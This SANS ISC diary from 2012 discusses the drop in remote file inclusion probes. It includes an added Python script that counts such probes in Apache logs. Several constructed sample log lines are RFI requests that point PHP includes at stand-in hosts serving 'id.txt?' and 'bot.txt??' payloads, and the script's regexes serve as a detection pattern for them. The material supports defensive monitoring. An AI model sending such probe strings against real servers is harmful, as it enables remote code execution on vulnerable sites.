
SANS ISC: What happened to RFI attacks? SANS ISC InfoSec Forums

What happened to RFI attacks?

Recently, I noticed a remarkable decrease in remote file inclusion attacks against my web servers. Usually, I easily detected 100+ attacks per day using a simple regular expression match. These days, I see maybe a dozen (and they are usually only 2-3 distinct "attacks", meaning different exploits or different attackers).

The number of vulnerabilities exploited also decreased a lot, with many of the older vulnerabilities being no longer probed. 

Have all vulnerable systems been exploited or cleaned up? These attacks were never very effective, and a lot of the exploits used would not have been successful even against vulnerable systems. In addition, the attacks were usually launched blindly without reconnaissance, leading to a lot of hits to nonexistent pages.

For the few attacks still out there, the pattern hasn't changed much. I checked out a couple of the payloads and they are either simple indicators or PHP IRC bots.

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


ISC Handler
Mar 7th 2012
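The diary mentions counting RFI probes with "a simple regular expression match" and grouping them into distinct attacks (different exploits or different attackers). The script below is an added example, not code from the diary or from the ISC, showing one way to do that over Apache combined-format access logs. The log lines, IP addresses and payload URLs are constructed for the example; the parameter names and the `strict` option are my own choices. It flags any query parameter whose value starts with a remote URL, and the `strict` mode additionally requires the classic trailing `?` that RFI payloads use to discard whatever suffix (such as `.php`) the vulnerable script appends, which avoids firing on legitimate redirect parameters:

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed Apache combined-format log lines (not from the diary's servers).
# Lines 1-3 and 6 are RFI-style probes; line 4 is a normal request; line 5 is a
# redirect parameter that carries a URL but is not an include attempt.
SAMPLE_LOG = """\
203.0.113.10 - - [07/Mar/2012:01:12:03 +0000] "GET /index.php?page=http://198.51.100.7/id.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
203.0.113.10 - - [07/Mar/2012:01:12:04 +0000] "GET /wp-content/plugins/foo/bar.php?path=http://198.51.100.7/id.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
198.51.100.20 - - [07/Mar/2012:02:30:11 +0000] "GET /admin/config.php?inc=http://198.51.100.9/bot.txt?? HTTP/1.0" 404 480 "-" "Mozilla/5.0"
192.0.2.5 - - [07/Mar/2012:03:00:00 +0000] "GET /about.php?page=contact HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.6 - - [07/Mar/2012:03:05:00 +0000] "GET /redirect.php?url=https%3A%2F%2Fexample.com%2F HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.10 - - [08/Mar/2012:01:12:03 +0000] "GET /index.php?page=ftp://198.51.100.7/id.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
"""

# Apache combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Broad RFI match: a query parameter whose value begins with a remote URL.
RFI_RE = re.compile(r'[?&][^=&]*=(?P<remote>(?:https?|ftp)://[^&\s]+)', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['day'] = rec['ts'].split(':', 1)[0]  # "07/Mar/2012:01:12:03 +0000" -> "07/Mar/2012"
    return rec


def find_rfi(url, strict=False):
    """Return the remote URL if the request looks like an RFI probe, else None.

    The request URL is percent-decoded first so that encoded schemes are seen.
    In strict mode the remote URL must end in '?', the usual RFI trick for
    discarding a suffix appended by the vulnerable include() call.
    """
    decoded = unquote(url)
    m = RFI_RE.search(decoded)
    if not m:
        return None
    remote = m.group('remote')
    if strict and not remote.endswith('?'):
        return None
    return remote


def summarize(log_text, strict=False):
    """Per-day counts: total hits, distinct payload URLs, distinct source IPs, 404s."""
    per_day = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        remote = find_rfi(rec['url'], strict=strict)
        if remote is None:
            continue
        per_day[rec['day']].append((rec['ip'], remote, rec['status']))
    return {
        day: {
            'hits': len(hits),
            # "distinct attacks" in the diary's sense: different payloads or different attackers
            'distinct_payloads': len({remote for _, remote, _ in hits}),
            'distinct_sources': len({ip for ip, _, _ in hits}),
            # blind probes mostly land on pages that do not exist
            'not_found': sum(1 for _, _, status in hits if status == '404'),
        }
        for day, hits in per_day.items()
    }


if __name__ == '__main__':
    for mode in (False, True):
        print('strict' if mode else 'broad')
        for day, stats in sorted(summarize(SAMPLE_LOG, strict=mode).items()):
            print(' ', day, stats)
```

On the sample data the broad pattern reports four hits on 7 March from three sources, one of which is the benign redirect; the strict pattern drops that one and leaves two distinct payloads from two attackers, which is the "2-3 distinct attacks" picture the diary describes. Counting 404s separately is a cheap way to confirm the probes are blind.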
Have you noticed the lack of WordPress spam? A lot of it came from Ubiquity Servers, a VPS provider; servers there were disconnected and all the spam dropped. As for the RFI attacks, what if the new attack is patching RFI vulnerabilities in a system to use it for something other than noisy scanning?
Also, most RFI attacks were "register_globals"-specific, and that setting is now deprecated.
